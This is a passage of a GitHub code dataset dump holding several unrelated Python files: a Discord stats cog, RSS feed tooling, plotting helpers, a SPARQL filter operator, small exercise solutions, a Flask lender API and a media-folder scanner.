f'{int(playerTC[\"crazywalls_wins_solo_chaos\"] if \"crazywalls_wins_solo_chaos\" in playerTC else 0) / int(playerTC[\"crazywalls_losses_solo_chaos\"] if \"crazywalls_losses_solo_chaos\" in playerTC else 1):.2f}'},\n ],\n '3': [\n {'description': 'Crazy Walls - **Team Normal**'},\n {'name': 'Kills', 'value': playerTC[\"crazywalls_kills_team\"] if 'crazywalls_kills_team' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"crazywalls_deaths_team\"] if 'crazywalls_deaths_team' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"crazywalls_wins_team\"] if 'crazywalls_wins_team' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"crazywalls_losses_team\"] if 'crazywalls_losses_team' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"crazywalls_kills_team\"] if \"crazywalls_kills_team\" in playerTC else 0) / int(playerTC[\"crazywalls_deaths_team\"] if \"crazywalls_deaths_team\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': f'{int(playerTC[\"crazywalls_wins_team\"] if \"crazywalls_wins_team\" in playerTC else 0) / int(playerTC[\"crazywalls_losses_team\"] if \"crazywalls_losses_team\" in playerTC else 1):.2f}'},\n ],\n '4': [\n {'description': 'Crazy Walls - **Team Lucky**'},\n {'name': 'Kills', 'value': playerTC[\"crazywalls_kills_team_chaos\"] if 'crazywalls_kills_team_chaos' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"crazywalls_deaths_team_chaos\"] if 'crazywalls_deaths_team_chaos' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"crazywalls_wins_team_chaos\"] if 'crazywalls_wins_team_chaos' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"crazywalls_losses_team_chaos\"] if 'crazywalls_losses_team_chaos' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"crazywalls_kills_team_chaos\"] if \"crazywalls_kills_team_chaos\" in playerTC else 0) / int(playerTC[\"crazywalls_deaths_team_chaos\"] if \"crazywalls_deaths_team_chaos\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': f'{int(playerTC[\"crazywalls_wins_team_chaos\"] if \"crazywalls_wins_team_chaos\" in playerTC else 0) / int(playerTC[\"crazywalls_losses_team_chaos\"] if \"crazywalls_losses_team_chaos\" in playerTC else 1):.2f}'},\n ]\n },\n # 'image': f'https://visage.surgeplay.com/full/256/{playerName}'\n }\n embed = discord.Embed(**emb[\"embed\"])\n embed.set_thumbnail(url=emb[\"thumbnail\"])\n for page in range(len(emb[\"pages\"])):\n 
for field in emb[\"pages\"][str(page)]:\n if 'description' in field:\n embed.description = field[\"description\"]\n else:\n embed.add_field(**field)\n if 'image' in emb:\n embed.set_image(url=emb[\"image\"])\n embed.set_footer(text=emb[\"footer\"][\"text\"], icon_url=emb[\"footer\"][\"icon_url\"])\n embeds[page] = embed\n del embed\n embed = discord.Embed(**emb[\"embed\"])\n embed.set_thumbnail(url=emb[\"thumbnail\"])\n return embeds\n\ndef setup(bot):\n h = CrazyWalls(bot)\n bot.add_cog(h)\n","repo_name":"HypixelBot/bot","sub_path":"hypixel/crazywalls.py","file_name":"crazywalls.py","file_ext":"py","file_size_in_byte":8987,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"14988666946","text":"#!/usr/bin/env python3\n\n# This file is part of PyCeed.\n#\n# PyCeed is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, version 3 of the License.\n#\n# PyCeed is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\t See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with PyCeed. If not, see .\n\nimport feedparser\nfrom feedgen.feed import FeedGenerator\n\nout_feed = FeedGenerator()\n\nurl = 'http://www.courantpositif.fr/feed/'\nd = feedparser.parse(url)\nprint(\"~~ %s ~~\" % d.feed.title)\nout_feed.title(d.feed.title)\nout_feed.subtitle(d.feed.subtitle)\nout_feed.id(d.feed.get(\"id\", \"no id\"))\nout_feed.updated(d.feed.updated)\n\nfor e in d.entries:\n\tprint(\" * [%s] %s\" % (e.published, e.title))\n\tout_entry = out_feed.add_entry()\n\tout_entry.title(e.title)\n\tout_entry.published(e.published)\n\tout_entry.updated(e.updated)\n\tout_entry.id(e.id)\n\tout_entry.summary(e.summary)\n\tfor c in e.content:\n\t\tout_entry.content(content=c.value, type=c.type) #, src=c.base\n\tfor l in e.links:\n\t\tprint(\"\t > [%s] %s\" % (l.rel, l.href))\n\t\tout_entry.link(link=l)\n\nprint(\"\\n\\n%s\" % out_feed.atom_str(pretty=True))\n","repo_name":"cadrian/pyceed","sub_path":"test/poc/test-feeds.py","file_name":"test-feeds.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"3971607945","text":"import matplotlib\nfrom matplotlib import pyplot as plt\n\nfrom .simulation import Result\n\n# global settings for plots\nplt.rcParams.update({\n 'axes.labelsize': 'large',\n 'axes.labelweight': 'bold',\n 'axes.titlesize': 'medium',\n 'axes.titleweight': 'bold',\n 'legend.fontsize': 'small',\n 'xtick.labelsize': 'large',\n 'ytick.labelsize': 'large',\n 'figure.facecolor': '1.00'\n })\n\n\n# consistent plotting styles\ncolors = plt.rcParams['axes.prop_cycle'].by_key()['color']\nkwargs_data_plot = {'marker': 's', 'linestyle': '--', 'linewidth': 1}\nkwargs_data = {'marker': 's', 'linestyle': '--', 'linewidth': 1, 'capsize': 3}\nkwargs_sim = {'marker': None, 'linestyle': '-', 'linewidth': 2}\n\n\ndef add_line(xid, yid, ax, s, color='black', label='', xf=1.0, kwargs_sim=kwargs_sim, **kwargs):\n \"\"\"\n\n :param xid:\n :param yid:\n :param ax:\n :param s: namedtuple Result from simulate\n :param color:\n :return:\n \"\"\"\n kwargs_plot = dict(kwargs_sim)\n kwargs_plot.update(kwargs)\n\n if isinstance(s, Result):\n x = s.mean[xid]*xf\n\n ax.fill_between(x, 
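The CrazyWalls embed above repeats the same Kills/Deaths/Wins/Losses/KDR/WLR block once per game mode; a hypothetical helper (all names here are invented) that builds one such page from a stat-key prefix and suffix:

def mode_page(stats, title, prefix="crazywalls_", suffix=""):
    # stats is the playerTC dict from the record above; missing keys count as 0
    def g(stat):
        return int(stats.get(f"{prefix}{stat}{suffix}", 0))
    kills, deaths = g("kills"), g("deaths")
    wins, losses = g("wins"), g("losses")
    return [
        {"description": f"Crazy Walls - **{title}**"},
        {"name": "Kills", "value": kills},
        {"name": "Deaths", "value": deaths},
        {"name": "Wins", "value": wins},
        {"name": "Losses", "value": losses},
        {"name": "KDR", "value": f"{kills / max(deaths, 1):.2f}"},
        {"name": "WLR", "value": f"{wins / max(losses, 1):.2f}"},
    ]

page = mode_page({"crazywalls_kills_solo": 7, "crazywalls_deaths_solo": 2},
                 "Solo Normal", suffix="_solo")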
s.min[yid], s.mean[yid] - s.std[yid], color=color, alpha=0.3, label=\"__nolabel__\")\n ax.fill_between(x, s.mean[yid] + s.std[yid], s.max[yid], color=color, alpha=0.3, label=\"__nolabel__\")\n ax.fill_between(x, s.mean[yid] - s.std[yid], s.mean[yid] + s.std[yid], color=color, alpha=0.5, label=\"__nolabel__\")\n\n ax.plot(x, s.mean[yid], '-', color=color, label=\"sim {}\".format(label), **kwargs_plot)\n else:\n x = s[xid] * xf\n ax.plot(x, s[yid], '-', color=color, label=\"sim {}\".format(label), **kwargs_plot)\n\n\n\n","repo_name":"matthiaskoenig/liverfunction","sub_path":"liverfunction/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31895674631","text":"\"\"\"\nCreated on Mar 03, 2014\n\nImplements the Xfilter operator.\nThe intermediate results are represented in a queue.\n\n@author: Maribel Acosta Deibe\n\"\"\"\n\nfrom multiprocessing import Queue\nfrom DeTrusty.Sparql.Parser.services import Filter, Expression, Argument\nimport datetime\nimport operator\n\nunary_operators = {\n '!': operator.not_,\n '+': '',\n '-': operator.neg,\n 'bound': lambda a: len(a) > 0,\n 'str': str\n}\n\nlogical_connectives = {\n '||': operator.or_,\n '&&': operator.and_\n}\n\narithmetic_operators = {\n '*': operator.mul,\n '/': operator.truediv,\n '+': operator.add,\n '-': operator.sub,\n}\n\ntest_operators = {\n '=': operator.eq,\n '!=': operator.ne,\n '<': operator.lt,\n '>': operator.gt,\n '<=': operator.le,\n '>=': operator.ge\n}\n\ndata_types = {\n 'integer': (int, 'numerical'),\n 'decimal': (float, 'numerical'),\n 'float': (float, 'numerical'),\n 'double': (float, 'numerical'),\n 'string': (str, str),\n 'boolean': (bool, bool),\n 'dateTime': (datetime, datetime),\n 'nonPositiveInteger': (int, 'numerical'),\n 'negativeInteger': (int, 'numerical'),\n 'long': (int, 'numerical'),\n 'int': (int, 'numerical'),\n 'short': (int, 'numerical'),\n 'byte': (bytes, bytes),\n 'nonNegativeInteger': (int, 'numerical'),\n 'unsignedLong': (int, 'numerical'),\n 'unsignedInt': (int, 'numerical'),\n 'unsignedShort': (int, 'numerical'),\n 'unsignedByte': (bytes, bytes), # TODO: this is not correct\n 'positiveInteger': (int, 'numerical')\n}\n\nnumerical = (int, int, float)\n\n\nclass Xfilter(object):\n\n name = \"FILTER\"\n\n def __init__(self, filter):\n self.input = Queue()\n self.qresults = Queue()\n self.filter = filter\n\n def execute(self, left, dummy, out, processqueue=Queue()):\n # Executes the Xfilter.\n self.left = left\n self.qresults = out\n # print \"self.filter.expr.op\", self.filter.expr.op\n # print \"self.filter.expr.left\", self.filter.expr.left\n # print \"self.filter.expr.right\", self.filter.expr.right\n # Apply filter tuple by tuple.\n tuple = self.left.get(True)\n\n # print 'tuple ', tuple\n\n while (tuple != \"EOF\"):\n (res, _) = self.evaluateComplexExpression(tuple, self.filter.expr.op, (self.filter.expr.left, None),\n (self.filter.expr.right, None))\n if res:\n self.qresults.put(tuple)\n\n tuple = self.left.get(True)\n # print 'tuple ', tuple\n\n # Put EOF in queue and exit.\n self.qresults.put(\"EOF\")\n # return\n\n def __repr__(self):\n return str(self.__class__) + \">> FILTER (\" + str(self.filter.expr.left) + \" \" + str(\n self.filter.expr.op) + \" \" + str(self.filter.expr.right) + \")\"\n\n # Base case.\n def evaluateOperator(self, operator, expr_left, expr_right):\n # print \"operator in Filter\", operator, expr_left, expr_right, type(expr_left), 
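For the band-plotting helper above, the plain-dict branch reduces to a single ax.plot call; a minimal headless usage sketch (the "time"/"y" keys are invented for the example):

import matplotlib
matplotlib.use("Agg")  # assumption: render off-screen
import matplotlib.pyplot as plt
import numpy as np

s = {"time": np.linspace(0, 10, 50), "y": np.linspace(5.0, 4.0, 50)}
fig, ax = plt.subplots()
ax.plot(s["time"], s["y"], "-", label="sim")  # what add_line does for a dict input
ax.legend()
fig.savefig("sim.png")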
type(expr_right)\n if (operator in logical_connectives):\n # print \"Case: logical connectives\"\n return self.evaluateLogicalConnective(operator, expr_left, expr_right)\n elif operator in arithmetic_operators:\n # print \"Case: arithmetic operator\", operator\n return self.evaluateAritmethic(operator, expr_left, expr_right)\n elif (operator in unary_operators):\n # print \"Case: unary_operators\"\n return self.evaluateUnaryOperator(operator, expr_left)\n elif (operator in test_operators):\n # print \"Case: test\"\n return self.evaluateTest(operator, expr_left, expr_right)\n\n # Inductive case.\n def evaluateComplexExpression(self, tuple, operator, left, right):\n (expr_left, type_left), (expr_right, type_right) = left, right\n # Case 1: Inductive case binary operator OP(Expr, Expr)\n res = None\n if isinstance(expr_left, Expression) and isinstance(expr_right, Expression):\n # print \"Case 1\"\n res_left = self.evaluateComplexExpression(tuple, expr_left.op, (expr_left.left, type_left),\n (expr_left.right, type_right))\n res_right = self.evaluateComplexExpression(tuple, expr_right.op, (expr_right.left, type_left),\n (expr_right.right, type_right))\n\n res = self.evaluateOperator(operator, res_left, res_right)\n # print \"res:\", res\n # print \"\\n--------------------------\"\n\n # Case 2: Inductive case binary operator OP(Expr, Arg)\n elif isinstance(expr_left, Expression) and isinstance(expr_right, Argument):\n # print \"Case 2\"\n res_left = self.evaluateComplexExpression(tuple, expr_left.op, (expr_left.left, type_left),\n (expr_left.right, type_right))\n if expr_right.constant:\n res_right = expr_right.name\n else:\n res_right = self.extractValue(tuple[expr_right.name[1:]])\n res = self.evaluateOperator(operator, res_left, res_right)\n\n # Case 3: Inductive case binary operator OP(Arg, Expr)\n elif isinstance(expr_left, Argument) and isinstance(expr_right, Expression):\n # print \"Case 3\"\n # if expr_left.name[1:] in tuple:\n if expr_left.constant:\n res_left = (expr_left.name, str)\n else:\n res_left = self.extractValue(tuple[expr_left.name[1:]])\n res_right = self.evaluateComplexExpression(tuple, expr_right.op, (expr_right.left, type_left),\n (expr_right.right, type_right))\n res = self.evaluateOperator(operator, res_left, res_right)\n # else:\n # return None\n # Case 4: Inductive case unary operator OP(Expr, None)\n elif isinstance(expr_left, Expression):\n # print \"Case 4\"\n res_left = self.evaluateComplexExpression(tuple, expr_left.op, (expr_left.left, type_left),\n (expr_left.right, type_right))\n res = self.evaluateOperator(operator, res_left, None)\n\n # Case 5: Base case binary operator OP(Arg, Arg)\n elif isinstance(expr_left, Argument) and isinstance(expr_right, Argument):\n # print \"Case 5\", expr_left.constant, expr_right.constant, tuple[expr_left.name[1:]], expr_right.name\n if expr_left.constant:\n res_left = expr_left.name, str\n else:\n res_left = self.extractValue(tuple[expr_left.name[1:]])\n if expr_right.constant:\n res_right = (expr_right.name, str)\n else:\n res_right = self.extractValue(tuple[expr_right.name[1:]])\n # print \"res left, right \", res_left, operator, res_right\n res = self.evaluateOperator(operator, res_left, res_right)\n # print res\n\n # Case 6: Base case unary operator OP(Arg, None)\n elif isinstance(expr_left, Argument):\n # print \"Case 6\"\n if expr_left.constant:\n res_left = expr_left.name\n else:\n res_left = self.extractValue(tuple[expr_left.name[1:]])\n res = self.evaluateOperator(operator, res_left, None)\n else:\n pass\n return 
res\n\n '''\n evaluateEBV: calculates whether an argument is an Effective Boolean Value (EBV)\n according to the definition in the SPARQL documentation \n See: http://www.w3.org/TR/sparql11-query/#ebv\n\n input: val -- an argument\n return: (isEBV, EBV) -- both of Python type bool\n '''\n\n def evaluateEBV(self, casted_val, type_val):\n\n # Handles python data types.\n if (isinstance(casted_val, bool)):\n return (True, casted_val)\n if (isinstance(casted_val, numerical)):\n if (casted_val == 0 or casted_val == 'nan'):\n return (True, False)\n else:\n return (True, True)\n\n # Rule 1\n if ((type_val == bool) and (casted_val != 'true') and (casted_val != 'false')):\n return (True, False)\n elif ((type_val == 'numeric') and not (isinstance(casted_val, numerical))):\n return (True, False)\n\n # Rule 2\n if (type_val == bool):\n if (casted_val == 'true'):\n return (True, True)\n elif (casted_val == 'false'):\n return (True, False)\n\n # Rule 3\n if (type_val == str):\n if (len(casted_val) == 0):\n return (True, False)\n else:\n return (True, True)\n\n # Rule 4\n if ((type_val == 'numeric')):\n if (casted_val == 0 or casted_val == 'nan'):\n return (True, False)\n else:\n return (True, True)\n\n # Rule 5: The error type should be raised by the evaluators.\n return (False, None)\n\n def evaluateUnaryOperator(self, operator, left):\n (expr_left, type_left) = left\n\n if (operator == '+' and isinstance(expr_left, numerical)):\n return (expr_left, type_left)\n\n elif (operator == '-' and isinstance(expr_left, numerical)):\n return (unary_operators[operator](expr_left), type_left)\n elif (operator == 'bound'):\n return (unary_operators[operator](expr_left), type_left)\n elif (operator == 'str'):\n return (unary_operators[operator](expr_left), str)\n elif (operator == '!'):\n (isEBV, ebv) = self.evaluateEBV(expr_left, type_left)\n if (isEBV):\n return (unary_operators[operator](ebv), type_left)\n else:\n raise SPARQLTypeError\n else:\n raise SPARQLTypeError\n\n def evaluateLogicalConnective(self, operator, left, right):\n (expr_left, type_left), (expr_right, type_right) = left, right\n\n (isEBV_left, ebv_left) = self.evaluateEBV(expr_left, type_left)\n (isEBV_right, ebv_right) = self.evaluateEBV(expr_right, type_right)\n\n # print \"in evaluateLogicalConnective\", expr_left, isEBV_left, ebv_left\n # print \"in evaluateLogicalConnective\", expr_right, isEBV_right, ebv_right\n\n if (isEBV_left and isEBV_right):\n return (logical_connectives[operator](ebv_left, ebv_right), bool)\n\n elif (isEBV_left):\n res = logical_connectives[operator](ebv_left, 'Error')\n if (res == 'Error'):\n raise SPARQLTypeError\n else:\n return (res, bool)\n\n elif (isEBV_right):\n res = logical_connectives[operator](ebv_right, 'Error')\n if (res == 'Error'):\n raise SPARQLTypeError\n else:\n return (res, bool)\n\n def evaluateTest(self, operator, left, right):\n if left and right:\n (expr_left, type_left), (expr_right, type_right) = left, right\n else:\n print(\"Exception: left or right operand None.\", left, right)\n raise Exception\n if ((type(expr_left) == type(expr_right)) or (\n isinstance(expr_left, numerical) and isinstance(expr_right, numerical))):\n\n return (test_operators[operator](expr_left, expr_right), bool)\n else:\n try:\n if isinstance(expr_left, numerical):\n ltyp = type(expr_left)\n expr_right = ltyp(expr_right)\n elif isinstance(expr_right, numerical):\n rtype = type(expr_right)\n expr_left = rtype(expr_left)\n return (test_operators[operator](expr_left, expr_right), bool)\n except:\n print(\"SPARQLTypeError 
- in Xfilter\")\n raise SPARQLTypeError\n\n def evaluateAritmethic(self, operator, left, right):\n (expr_left, type_left), (expr_right, type_right) = left, right\n # print \"evaluateAritmethic(), \", expr_left, expr_right, operator, type(expr_left), type(expr_right), expr_right, type_left, type_right\n\n if (isinstance(expr_left, numerical) and isinstance(expr_right, numerical)):\n return (\n arithmetic_operators[operator](expr_left, expr_right), type_left) # TODO: implement the cases with types\n elif (isinstance(expr_left, numerical) and isinstance(expr_right, str)):\n expr_right = int(expr_right)\n expr_left = int(expr_left)\n # print expr_right,expr_left , (arithmetic_operators[operator](expr_left, expr_right), type_left)\n return (\n arithmetic_operators[operator](expr_left, expr_right), type_left) # TODO: implement the cases with types\n else:\n raise SPARQLTypeError\n\n def extractValue(self, val):\n pos = val.find(\"^^\")\n # Handles when the literal is typed.\n if (pos > -1):\n for t in data_types.keys():\n if (t in val[pos:]):\n (python_type, general_type) = data_types[t]\n if (general_type == bool):\n return (val[:pos], general_type)\n else:\n return (python_type(val[:pos]), general_type)\n else:\n return (str(val), str)\n\n\nclass SPARQLTypeError(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n pass\n","repo_name":"SDM-TIB/DeTrusty","sub_path":"DeTrusty/Operators/AnapsidOperators/Xfilter.py","file_name":"Xfilter.py","file_ext":"py","file_size_in_byte":13518,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"70436762614","text":"def add(num1: int, num2: int) -> int:\n num1: str = str(num1)\n num2: str = str(num2)\n if len(num1) < len(num2):\n num1 = num1.zfill(len(num2))\n else:\n num2 = num2.zfill(len(num1))\n my_sum: str = ''\n for i in zip(num1, num2):\n my_sum += str(sum(int(j) for j in i))\n return int(my_sum)","repo_name":"ZaytsevNS/python_codewars","sub_path":"7KYU/add_v3.py","file_name":"add_v3.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"72533759414","text":"print('Lab 11: Make Change')\n\n### Version 1 ###\n\nprint('Welcome to the Change Maker 5000 (tm)')\n\nwhile True:\n\n dollar = float(input('Enter a dollar amount: $'))\n\n quarters = dollar//.25\n dollar %= .25\n dimes = dollar//.10\n dollar %= .10\n nickels = dollar//.05\n dollar %= .05\n pennies = dollar//.01\n \n print(f'Your change is {quarters} quarter(s), {dimes} dime(s), {nickels} nickle(s), {pennies} penny(ies).')\n \n # allow the user to choose whether they want to play again\n play_again = input('Would you like to make more change? yes/no: ')\n\n valid_yes = ['y', 'yes', 'yep']\n valid_no = ['n', 'no', 'nope']\n valid_choices = valid_yes + valid_no\n\n while play_again not in valid_choices:\n print(f'You chose an invalid selection: {play_again}')\n play_again = input('Would you like to make more change? 
yes/no: ')\n\n if play_again in valid_no:\n print('Thanks for the Business!!')\n break\n\n elif play_again in valid_yes:\n continue\n\n#----------------------------------------------------------------------------#","repo_name":"lisamonique/-PDX-Code-Guild---Python-Fullstack-Solutions-.","sub_path":"Labs/Lab_11_Make_Change.py","file_name":"Lab_11_Make_Change.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12907637214","text":"from flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required, current_identity\nfrom models.lender import LenderModel\nfrom models.user import UserModel\nfrom models.application import ApplicationModel\nfrom werkzeug.security import safe_str_cmp\n\nclass Lender(Resource):\n \n parser = reqparse.RequestParser()\n parser.add_argument('id',\n type=int,\n required=False,\n help=\"This field is not required\"\n )\n parser.add_argument('name',\n type=str,\n required=True,\n help=\"This field cannot be blank.\"\n )\n parser.add_argument('lendercode',\n type=str,\n required=True,\n help=\"This field cannot be blank.\"\n )\n \n @jwt_required()\n def get(self):\n code = current_identity.lendercode\n lender = LenderModel.find_by_lendercode(code)\n if lender:\n return lender.json(), 200\n return {'Message': \"No lender with lendercode '{}' was found\".format(code)}, 404\n \n @jwt_required()\n def post(self):\n data = Lender.parser.parse_args()\n if not safe_str_cmp(current_identity.lendercode, '000'):\n return {\"Message\": \"You do not have the rights to create lenders. Please consult a member of (000) Admin Lender.\"}, 401\n if len(data['lendercode']) != 3:\n return {\"Message\": \"Lendercode for a new lender must be 3 numbers.\"}, 400\n lender = LenderModel.find_by_lendercode(data['lendercode'])\n if lender:\n return {\"Message\": \"A lender with that code already exists. Please use a lender that have a non-conflicting code.\"}, 304\n \n lender = LenderModel(data['name'], data['lendercode'])\n lender.save_to_db()\n return {\"Message\": \"Lender created successfully.\"}, 201\n \n @jwt_required()\n def put(self):\n data = Lender.parser.parse_args()\n if not safe_str_cmp(current_identity.lendercode, '000'):\n return {\"Message\": \"You do not have the rights to create lenders. Please consult a member of (000) Admin Lender.\"}, 401\n lender = LenderModel.find_by_id(data['id'])\n if lender is None:\n return {\"Message\": \"No lender with id '{}' exists. Please create the lender before saving.\".format(data['id'])}, 304\n if safe_str_cmp(lender.lendercode, '000'):\n return {\"Message\": \"Lender 000 cannot be modified.\"}, 403\n if not safe_str_cmp(lender.lendercode, data['lendercode']):\n return {\"Message\": \"Cannot change the lendercode of an already created lender.\"}, 400\n \n lender.name = data['name']\n lender.save_to_db()\n return {\"Message\": \"Lender updated.\"}, 200\n \n @jwt_required()\n def delete(self, lendercode):\n if not safe_str_cmp(current_identity.lendercode, '000'):\n return {\"Message\": \"You do not have the rights to create lenders. 
Please consult a member of (000) Admin Lender.\"}, 401\n        lender = LenderModel.find_by_lendercode(lendercode)\n        if lender is None:\n            return {\"Message\": \"No lender with lendercode '{}' exists.\".format(lendercode)}, 304\n        if safe_str_cmp(lendercode, '000'):\n            return {\"Message\": \"Lender 000 cannot be deleted.\"}, 403\n        \n        try:\n            UserModel.delete_all_by_lendercode(lendercode)\n            ApplicationModel.delete_all_by_lendercode(lendercode)\n            lender.delete_from_db()\n            return {\"Message\": \"Lender and all related users/applications were deleted successfully.\"}, 200\n        except RuntimeError as err:\n            return {\"Message\": \"Problem deleting. Please try again. Error: \" + str(err)}, 500\n        \nclass Lenders(Resource):\n    @jwt_required()\n    def get(self):\n        lenders = LenderModel.grab_all_lenders()\n        return {'Lenders': lenders}, 200","repo_name":"btvanhooser/simple-lending-api","sub_path":"resources/lender.py","file_name":"lender.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27827141093","text":"#!/usr/bin/env python\n\"\"\"\nGiven a positive integer n, write a function that returns true if it is a\nperfect square and false otherwise. Don’t use any built-in math functions like\nsqrt. Hint: Use binary search!\n\nExamples:\n\n$ perfectSquare(25)\n$ true\n\n$ perfectSquare(10)\n$ false\n\"\"\"\n\nfrom hypothesis import given\nimport hypothesis.strategies as st\n\ndef perfect_square(n: int):\n    assert n > 0\n    lo = 1\n    while 4 * lo * lo < n:\n        lo *= 2\n    # lo is now the highest power of 2 strictly less than sqrt(n)\n    hi = lo\n    while hi * hi < n:\n        hi *= 2\n    # hi is now the lowest power of 2 at least as big as sqrt(n)\n    if hi * hi == n:\n        return True\n    assert lo * lo < n < hi * hi\n    while hi - lo > 1:\n        mid = (lo + hi) // 2\n        midmid = mid * mid\n        if midmid < n:\n            lo = mid\n        elif midmid == n:\n            return True\n        else:\n            hi = mid\n    return False\n\n\ndef test_example1():\n    assert perfect_square(25) == True\n\n\ndef test_example2():\n    assert perfect_square(10) == False\n\n\n@given(st.integers(1))\ndef test_squares(n):\n    assert perfect_square(n * n) == True\n\n\n@given(st.integers(1))\ndef test_squares_plus_one(n):\n    assert perfect_square(n * n + 1) == False\n\n\n@given(st.integers(1))\ndef test_squares_times_three(n):\n    assert perfect_square(n * n * 3) == False\n","repo_name":"pozorvlak/cassidoo","sub_path":"2020/2020-11-23_perfect_square/perfect_square.py","file_name":"perfect_square.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27689270608","text":"'''\nGiven n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai).\nn vertical lines are drawn such that the two endpoints of the line i is at (i, ai) and (i, 0).\nFind two lines, which, together with the x-axis forms a container, such that the container contains the most water.\n'''\n\ndef maxArea(height):\n\n    def area(height, start, end):\n        return height * (end - start)\n\n    true_max = 0\n\n    i, j = 0, len(height) - 1\n\n    while i != j:\n        true_max = max(true_max, area(min(height[i], height[j]), i, j))\n        if height[i] < height[j]:\n            i = i + 1\n        else:\n            j = j - 1\n\n    return true_max\n    \nprint(maxArea([1,8,6,2,5,4,8,3,7]))","repo_name":"ta05/LeetCode-Practice","sub_path":"11. containerWithMostWater.py","file_name":"11. 
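For the perfect-square search above, math.isqrt (stdlib, Python 3.8+) makes a handy oracle to test the binary-search version against:

import math

def perfect_square_oracle(n: int) -> bool:
    assert n > 0
    r = math.isqrt(n)  # exact floor integer square root
    return r * r == n

assert perfect_square_oracle(25) is True
assert perfect_square_oracle(10) is False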
containerWithMostWater.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74337264054","text":"import sys\nimport os\nimport shiki_parcer as parcer\nimport Database\nimport kinopoisk_parcer\nimport subprocess\nfrom subprocess import Popen, PIPE\n\nmults = []\nfilms = []\nserial = False\n#scanpath = \"/home/howe251/test\"\nscanpath = \"/var/www/films/films/assets/filmy\"\n#/var/www/films3/films/assets/filmy\n\n\ndef find_series_mult(k, i, mult):\n \"\"\"\n Поиск серий к мультикам отсканированным в check_files_mkv_mult\n :type k: list\n :param k: Список файлов\n :type i: int\n :param i: Индекс в списке\n :type mult: str\n :param mult: Путь к папке с мультами\n :return: Имя, список серий, путь к папке/файлу, индекс\n \"\"\"\n #print(k[i])\n if mult in k[i]:\n directory = k[i].replace(mult, '')\n if k[i].count('/') > scanpath.count('/') + 2:\n serial = True\n pathid = directory.find('/')\n path = directory[0:pathid]\n name = remove(directory[0:pathid].replace(\".\", \" \"))\n else:\n path = directory\n name = remove(directory)#.replace(\".\", \" \"))\n serial = False\n series = []\n if serial:\n while path in k[i] and i < len(k) - 1:\n seria = k[i].replace(mult, '')[k[i].replace(mult, '').find('/') + 1::]\n nameofseria = remove(seria)\n full_path = k[i].replace(mult, \"\")\n series.append({'name': nameofseria,\n 'full_name': seria,\n 'directory': path,\n 'full_path': full_path})\n #print(seria)\n try:\n if path not in k[i + 1]:\n break\n except IndexError:\n break\n i += 1\n else:\n seria = k[i].replace(mult, '')[k[i].replace(mult, '').find('/') + 1::]\n nameofseria = remove(seria)\n full_path = k[i].replace(mult, \"\")\n series.append({'name': nameofseria,\n 'full_name': seria,\n 'directory': path,\n 'full_path': full_path})\n #print(seria)\n return name, series, path, i\n\n\ndef find_files(root_dir, ext):\n \"\"\"\n Поиск файлов с определенным расширением в папках\n :param root_dir: Корневая папка (с которой начинать поиск)\n :type root_dir: str\n :param ext: Расширения файлов\n :type ext: list\n :return: Список найденных файлов\n \"\"\"\n k = []\n for root, dirs, files in os.walk(root_dir, followlinks=True, onerror=file_error):\n for file in files:\n if file.endswith(tuple(ext)):\n k.append(os.path.join(root, file))\n return k\n\n\ndef file_error(*args, **kwargs):\n print(args[0])\n sys.exit()\n\n\ndef check_files_mkv_mult():\n \"\"\"\n Сканер папки на файлы mkv Мультики\n :return: список словарей с мультиками\n :type: dict\n \"\"\"\n k = find_files(scanpath, ['mkv', 'avi'])\n mult = os.path.join(scanpath, \"Мультики\") + (\"\\\\\" if os.name == \"nt\" else \"/\")\n i = 0\n while i < len(k):\n if mult in k[i]:\n name, series, path, i = find_series_mult(k, i, mult)\n mults.append({'name': name,\n 'directory': path,\n 'series': series,\n 'detail': ''})\n i += 1\n return mults\n\n\ndef mult_detail(mults):\n \"\"\"\n Поиск детальной информации по мультфильму на Shikimori и Kinopoisk\n :param mults: список словарей с мультфильмами\n :return: Обработанный словарь\n \"\"\"\n for mult in mults:\n mult['detail'] = parcer.find(params={'search': mult['name'].replace(' ', '+')})\n return mults\n\n\ndef find_subs_mult():\n \"\"\"\n Функция поиска субтитров к мультикам\n :return: список словарей сабов\n \"\"\"\n k = find_files(scanpath, ['.ass'])\n mult = scanpath + \"/Мультики/\"\n i = 0\n subs = []\n 